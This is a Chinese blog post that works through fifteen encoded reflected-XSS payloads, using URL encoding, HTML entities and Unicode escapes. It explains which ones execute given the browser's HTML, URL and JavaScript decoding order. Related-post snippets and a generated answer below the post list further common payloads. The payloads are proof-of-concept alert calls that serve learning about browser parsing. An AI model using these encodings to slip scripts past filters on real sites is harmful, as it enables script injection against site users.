反射型XSS的几种payload

已于 2024-08-17 13:47:40 修改
阅读量321 收藏 6
点赞数 6
文章标签: xss 前端
于 2024-08-17 13:47:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_70638961/article/details/141278832
版权

目录

第一种:采用的是urlcode编码

第二种:前面用html实体编码,后面用urlcode编码

第三种:只对:使用urlcode编码

第四种:对<>进行html实体编码

第五种:textarea

第六种:和第五种一样

第七种:对'进行html实体编码

第八种:对'进行Unicode编码

第九种:对alert(9)进行html实体编码

第十种:对alert进行Unicode编码

第十一种:对alert(11)进行Unicode编码

第十二种:对alert和12进行Unicode编码

第十三种:对'进行Unicode编码

第十四种:在以下位置Unicode编码一个换行符\n

第十五种:先进行Unicode编码,再进行urlcode编码,最后进行html实体编码

总结:

第一种:采用的是urlcode编码

这里编码的就是javascript:alert(1)

<a href="%6a%61%76%61%73%63%72%69%70%74:%61%6c%65%72%74%28%31%29">aaa</a>

可以发现并没有执行。因为在href里面不认识urlcode编码后的协议

第二种:前面用html实体编码,后面用urlcode编码
<a href="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:%61%6c%65%72%74%28%32%29">

由于先进行html实体编码后变成:

<a href="javascript:%61%6c%65%72%74%28%32%29">

再进行url解码就可以识别javascript协议

第三种:只对:使用urlcode编码
<a href="javascript%3aalert(3)"></a>

同1,:冒号算协议一部分。

第四种:对<>进行html实体编码
<div>&#60;img src=x onerror=alert(4)&#62;</div>

当进入数据状态中的字符引用时,确实可以将编码字符进行解码,但不会进入标签开始状态。所以html把它当成一个字符串,可以展示,但无法执行。

第五种:textarea
<textarea>&#60;script&#62;alert(5)&#60;/script&#62;</textarea>

因为<textarea>RCDATA元素(RCDATA elements),可以容纳文本和字符引用,注意不能容纳其他元素

第六种:和第五种一样
<textarea><script>alert(6)</script></textarea>
第七种:对'进行html实体编码
<button onclick="confirm('7&#39;);">Button</button>

这里的inclick与a标签的href差不多,可以被html解码。所以执行成功了

第八种:对'进行Unicode编码
<button onclick="confirm('8\u0027);">Button</button>

执行失败,因为onclick中的值会交给JS处理,在JS中只有字符串和标识符能用Unicode表示,'显然不行

第九种:对alert(9)进行html实体编码
<script>&#97;&#108;&#101;&#114;&#116&#40;&#57;&#41;&#59</script>

由于script属于原始文本元素(Raw text elements),只可以容纳文本,注意没有字符引用,于是直接由JS处理,JS也认不出来,所以执行失败。

原始文本元素(Raw text elements)有<script><style>。

第十种:对alert进行Unicode编码
<script>\u0061\u006c\u0065\u0072\u0074(10);</script>

因为只有标识符,所以JS可以识别执行。

第十一种:对alert(11)进行Unicode编码
<script>\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0031\u0029</script>

因为JS中只有字符串和标识符能用Unicode表示,所以执行失败。

第十二种:对alert和12进行Unicode编码
<script>\u0061\u006c\u0065\u0072\u0074(\u0031\u0032)</script>

执行失败,虽然这里可以被解码,但是12被解码出来是字符串,需要引号包含。

第十三种:对'进行Unicode编码
<script>alert('13\u0027)</script>

肯定执行失败,同8

第十四种:在以下位置Unicode编码一个换行符\n
<script>alert('14\u000a')</script>

执行成功。

第十五种:先进行Unicode编码,再进行urlcode编码,最后进行html实体编码
<a href="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x25;&#x35;&#x63;&#x25;&#x37;&#x35;&#x25;&#x33;&#x30;&#x25;&#x33;&#x30;&#x25;&#x33;&#x36;&#x25;&#x33;&#x31;&#x25;&#x35;&#x63;&#x25;&#x37;&#x35;&#x25;&#x33;&#x30;&#x25;&#x33;&#x30;&#x25;&#x33;&#x36;&#x25;&#x36;&#x33;&#x25;&#x35;&#x63;&#x25;&#x37;&#x35;&#x25;&#x33;&#x30;&#x25;&#x33;&#x30;&#x25;&#x33;&#x36;&#x25;&#x33;&#x35;&#x25;&#x35;&#x63;&#x25;&#x37;&#x35;&#x25;&#x33;&#x30;&#x25;&#x33;&#x30;&#x25;&#x33;&#x37;&#x25;&#x33;&#x32;&#x25;&#x35;&#x63;&#x25;&#x37;&#x35;&#x25;&#x33;&#x30;&#x25;&#x33;&#x30;&#x25;&#x33;&#x37;&#x25;&#x33;&#x34;&#x28;&#x31;&#x35;&#x29;"></a>

符合web的解码顺序,所以可以被执行。

总结:

  1. <script><style>数据只能有文本,不会有HTML解码和URL解码操作

  2. <textarea><title>里会有HTML解码操作,但不会有子元素

  3. 其他元素数据(如div)和元素属性数据(如href)中会有HTML解码操作

  4. 部分属性(如href)会有URL解码操作,但URL中的协议需为ASCII

  5. JavaScript会对字符串和标识符Unicode解码

根据浏览器的自动解码,反向构造 XSS Payload 即可

zengyu3139707847
关注
  • 6
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
反射XSS漏洞基础
Ethan024的博客
03-11 305
XSS漏洞基础(本文仅供技术学习与分享) 反射XSS(GET)漏洞弹窗 实验准备: 皮卡丘靶场 实验步骤: 2. 确认页面是否存在XSS漏洞;在对应的输入点输入危险字符,包括’, ", <, >以及危险字符串等; 3. 确认输入后是否会被过滤,输出是否会被处理; 4. 这里输入<>后,发现输入的字符串未被过滤或转义: 5. 查看源码发现,发现我们输入的<>被输出在标签里面: 6. 因此我们可以推测,如果输入JavaScript代码,也不会被过滤。因此输入简单的
XSS-Payload
03-04
2. **反射XSS**:这种类XSS是通过诱使用户点击包含恶意代码的链接来触发的,一旦用户点击,脚本会在当前页面上执行。 3. **DOMXSS**:此类发生在DOM(文档对象模)中,恶意数据不是来自服务器响应,...
反射XSS、存储XSS和DOMXSS的简介及XSS常见payload构造及变形
bwxzdjn的博客
03-21 5171
用实验案例的形式记录学习三大常见的跨站脚本攻击:反射XSS、存储XSS和DOMXSS,借此来掌握XSS攻击的基础知识。还有几种payload的构造以及变形来绕过一些简单的过滤。
反射XSS(pikachu)攻略详解
DMXA的博客
10-27 287
防止反射XSS漏洞的关键是对用户输入进行严格的过滤和编码,避免恶意代码被执行。同时,也需要在后端做好校验和过滤,避免恶意代码被存储在数据库中。最后,使用CSP可以限制网页中执行的脚本来源,从而增加网页的安全性。在后端,可以对用户输入的内容进行严格的校验和过滤,确保不合法的输入不会被存储。等,或者使用一些正则表达式来限制输入的内容。同时,也可以对输入的内容进行编码,如。Content-Security-Policy头。比如可以对用户输入的特殊字符进行过滤,如。,限制网页中可以执行的脚本来源。
反射XSS靶场练习
qq_58000413的博客
09-25 1072
DVWA靶场第一关:low 直接一条alert(1)看看结果,很简单直接过关 第二关:Medium 继续接着一条alert(1)看结果,没有弹窗,接着我们看下源码 看到前端源码后,发现好像给过滤了,这时候我们需要考虑下为什么过滤 这时我们可以尝试下是不是因为这个组合导致的,不出意外应该是的 这时候我们可以尝试没有的payload,或者将通过大小写绕过alert(
dvwa学习笔记——反射xss
weixin_45082914的博客
07-27 1279
一、XSS的形成原理 xss中文名“跨站脚本攻击”, xss也是一种注入攻击,当web应用对用户输入过滤不严格,攻击者写入恶意的脚本代码(HTML、JavaScript)到网页中,如果用户访问了含有恶意代码的页面,恶意脚本就会被浏览器解析执行导致用户被攻击信息泄露。 常见危害:cookie窃取,session劫持,钓鱼攻击,蠕虫,ddos等 二、XSS的分类 1、反射xss 反射xss一般出现在URL参数中及网站搜索栏中,由于需要点击包含恶意代码的URL才可以触发,并且只能触发一次,所以也被
反射xss靶场练习
qq_64302290的博客
06-08 1222
反射xss危害小,这里使用的xss靶场是常用的xss靶场:xss-labs。当我们完成弹窗后就通过该关卡,说该关卡存在xss的一个漏洞并且可以解析js代码。
反射xss钓鱼盗取用户cookie
m0_53820621的博客
01-16 4469
演示用靶场:dvwa
结合DVWA的反射XSS浅析
qq_43660551的博客
01-08 2720
一.概念 XSS:跨站脚本攻击。黑客通过HTML注入篡改了网页,在网页中插入恶意脚本。 二.分类 1.反射XSS:简单地把用户输入的数据反射给浏览器。 2.存储XSS:将用户输入的数据存储在服务器端。 3.DOMXSS:通过修改页面的DOM节点形成XSS。 三.DVWA-XSS实践 1.低级 看下源码,这里无任何过滤。直接将用户的输入反射给浏览器。 故直接构造payload语句:<script>alert(/This is XSS!/)</s...
反射XSS
1stPeak's Blog
06-04 290
漏洞描述 跨站点脚本(XSS)是指客户端代码注入攻击,其中,攻击者可以将恶意脚本执行到合法网站或Web应用程序中。当Web应用程序在其生成的输出中使用未经验证或未编码的用户输入时,就会发生XSS。 漏洞验证 http://xx.xx.xx.xx?id=1'"()%26%25<acx><ScRiPt%20>alert(9999)</ScRiPt> ...
Python-一个基于burp的反射xss检测插件
08-12
3. **漏洞识别**:通过比较原始响应和带有payload的响应,判断是否存在反射XSS漏洞的迹象,如payload是否被执行。 4. **报告生成**:整理检测结果,生成详细的漏洞报告,包括受影响的URL、payload、验证过程等...
ourphp 站内信存储xss漏洞1
08-04
存储XSS漏洞是指攻击者将恶意代码存储在服务器上,而不是反射到用户浏览器上,这使得攻击者可以在服务器上存储恶意代码,以便日后攻击其他用户。在OurPHP 1.7.1版本中,站内信存储XSS漏洞就存在于站内信模块中。...
Xss Scan tool
05-25
XSS漏洞通常分为三种类反射XSS、存储XSS和DOMXSS。Burp ReflectiveXssMiao插件主要针对的是反射XSS,这种类的漏洞存在于动态生成的页面中,当用户点击一个包含恶意脚本的链接或提交包含恶意数据的表单...
XSS盲打与cookie劫持
m0_74249600的博客
08-14 849
本文紧接上篇文章讲述了XSS盲打、cookie劫持以及靶场实践,请关注持续更新(本文部分内容来自课件,如有版权问题请与我联系)
XSS-过滤特殊符号的正则绕过
最新发布
2301_78549931的博客
08-17 350
结果为数字8680439也就是说我们利用parseInt函数将关键字变为一串数字,但数字肯定无法运行,我们还需要再变回去,要将一个数字转换为特定的。
XSS的DOM破坏
m0_67441173的博客
08-17 523
@keyframes x{}
xss.pwnfunction-Easy
banliyaoguai的博客
08-17 404
然后要获取prototype携带的toString方法,且不能是Object.prototype下的字符串方法,因为后者返回的是一个元素,我们需要的是可控的字符串。然后你是用上面的两个属性弹窗一个属性就会以字符串的形式展示href里面的值,如果你用的是从object继承来的toString,就会返回一个对象,例子如下。我们看到innerHTML可以想到使用img标签,然后看到过滤了括号我们可以尝试使用location,然后使用%25编码%绕过()它匹配字符串 "ALERT(1337)"。
XSS跨站脚本攻击
m0_71864767的博客
08-16 794
\u0031\u0032在解码的时候会被解码为字符串`12`,注意是字符串,不是数字,文字显然是需要引号的,JS执行失败。#script属于原始文本元素只可以容纳文本,于是直接由JS处理,JS可以解析Unicode的编码。#script属于原始文本元素只可以容纳文本,于是直接由JS处理,JS可以解析Unicode的编码。#script属于原始文本元素只可以容纳文本,于是直接由JS处理,JS也认不出来,执行失败。#是RCDATA元素,可以容纳文本和字符引用,不能容纳其他元素。
xss漏洞手工构造payload
07-28
XSS漏洞是一种常见的网络安全漏洞,攻击者可以通过在网页中注入恶意的脚本代码来获取用户的敏感信息或者执行恶意操作。手工构造XSS payload是指攻击者通过编写特定的恶意代码来利用XSS漏洞。 在构造XSS payload时,攻击者通常会利用一些特殊的字符或者代码来绕过网站的过滤机制,使恶意代码能够被执行。一些常见的XSS payload包括但不限于以下几种: 1. `<script>alert('XSS')</script>`:这是最简单的XSS payload,它会在网页中弹出一个提示框。 2. `<img src="x" onerror="alert('XSS')">`:这个payload利用了`<img>`标签的`onerror`事件,当图片加载失败时会执行其中的代码。 3. `<svg/onload=alert('XSS')>`:这个payload利用了SVG标签的`onload`事件,当SVG图像加载完成时会执行其中的代码。 4. `javascript:alert('XSS')`:这个payload利用了JavaScript伪协议,直接在URL中执行JavaScript代码。 需要注意的是,构造XSS payload是一种攻击行为,严禁利用这些技术进行非法攻击。本文提到的payload仅供学习和研究用途,请遵守法律法规,不要进行任何违法行为。 #### 引用[.reference_title] - *1* *2* *3* [反射XSS、存储XSS和DOMXSS的简介及XSS常见payload构造及变形](https://blog.csdn.net/bwxzdjn/article/details/123645177)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值